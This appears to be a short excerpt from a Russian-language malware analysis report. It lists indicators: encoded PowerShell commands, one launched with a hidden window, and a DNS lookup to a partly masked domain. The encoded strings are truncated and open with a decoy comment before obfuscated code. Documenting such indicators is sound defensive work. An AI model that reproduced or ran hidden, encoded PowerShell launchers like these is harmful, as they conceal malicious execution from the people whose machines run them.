Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB1AHMAZQByAGMAZQBuAHQAcgBpAGMAagBrAGkAPQAnAEcAZQBuAGUAcgBpAGMAXwBHAHIAYQBuAGkAdABlAF8AQgBhAGwAbAB...
- DNS ASK va####ywishes.in
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB1AHMAZQByAGMAZQBuAHQAcgBpAGMAagBrAGkAPQAnAEcAZQBuAGUAcgBpAGMAXwBHAHIAYQBuAGkAdABlAF8AQgBhAGwAbAB...' (со скрытым окном)